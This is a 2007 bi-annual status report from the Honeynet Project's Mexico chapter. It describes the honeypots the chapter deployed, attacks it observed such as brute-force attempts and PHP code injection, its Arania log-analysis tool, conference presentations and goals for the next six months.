Honeynet Project Mexico http://www.honeynet.org.mx Bi-Annual Status Report March 2007- #1 1.0 DEPLOYEMENTS ================= 1.1 Current technologies deployed. Describe anything that you have deployed that is collecting information, including honeynets, client honeypots, honeyd, mwcollect, or anything else honeypot related. * The honeynets deployed are based on HoneyWall Roo with various O.S. utilizing VMWware for virtualization. * Honeypots: - Fedora Core 5 - Ubuntu Edgy - Windows 2000 (would be nice to deploy a Windows Vista) * Honeypot with nepenthes to collect malware * Honeypot wih arania to detect malicius code inyection on Mambo App Server 2.0 FINDINGS ============= 2.1 Highlight any unique findings, attacks, tools, or methods. * FTP/SSH brute force attacks * with arania collected diferent kind of php code injection, php backdoor an shell, C code to compile an exploit, diferent kind of perlbots. 2.2 Any trends seen in the past six months. * A lot of malware * a lot of FTP/SSH brute force attacks, but no successful. 3.0 LESSONS LEARNED =================== 3.1 What new positive things can you share with the community, so they can replicate your success? 3.2 What new mistakes can you share with the community, so they don't make the same mistakes? 3.3 Are there any research ideas you would like to see developed? * analyzing the motives and tactics of a typical attacker, wasn't possible without Honeynet * monitor the activity of the honeynet, so if the honeypot is comprimised we can have a quick answer for the incident. 4.0 TECHNOLOGY ======================= 4.1 What tools or functionality are we lacking, what do we need to work on? * None at this time 4.2 What new tools or technology are you working on? * Arania Arania is a PoC for detect GET inyection code in Mambo (maybe it works with others) and the primary use is for download the code for later analysis. "Simple" perl script to analyse the log for the Webserver and try to find remote code inclusion, inyection or execution. The code is located in our website http://www.honeynet.org.mx 4.3 Would you like to integrate this with any other tools, or you looking for help or collaboration with others in testing or developing the tool? * Honeywall 5.0 PAPERS AND PRESENTATIONS ============================ 5.1 Are you working any papers to be published, such as KYE or academic papers? * Writing a final work for B.D. and when the paper is finished, planning to restructuring the info and publishing a book. 5.2 Are you looking for any data or people to help with your papers? * Yes, all experiencies and any honeypot data related is welcome. 5.3 Where did you publish/present honeypot-related material? Articles: * Interview about Honeypots from an OpenSource Portal http://www.software.net.mx/desarrolladores/softwareprofesional/seguridad/Honeynetproject.htm * Jornal about Honeypot for a university e-Journal Presentations: * CICOL 2006, June/2006 Cuernavaca, Mexico * CONSOL 2006 Agust/2006 Mexico City * XII Simposium Internacional ISC September/2006 Toluca, Edo de México * 6tas Jornadas Regionales de Software Libre October/2006 Mendoza, Argentina * Expo-Informática 2006 November/2006 Toluca, Edo. de México * II CNICC 2006 Dicember/2006 Mazatlán, Sinaloa * CONSOL 2007 February/2007 México City 6.0 ORGANIZATIONAL ================== 6.1 Changes in the structure of your organization. * 2 members stepped down due to inactivity. * 1 member joined to the project 6.2 Your feedback on Alliance activities. * None at this time 6.3 Any suggestions for improving the Alliance? * None at this time 7.0 GOALS ========= 7.1 Which of your goals did you meet for the last six months? 7.2 Which of your goals did you not meet for the last six months? 7.3 Goals for the next six months * Working with nepenthes * Present at various conferences * Develop a visualization Honeypots * Deploying and maintaining Honeywall based Honeynets 8.0 MISC ACTIVITIES ==================== 8.1 Anything else not covered you would like to share. * Would be nice to deploy an LiveCD with all the honeypots software, maybe integrating qemu for virtualization. * Mirror of the Honeynet Project website http://mirror.honeynet.org.mx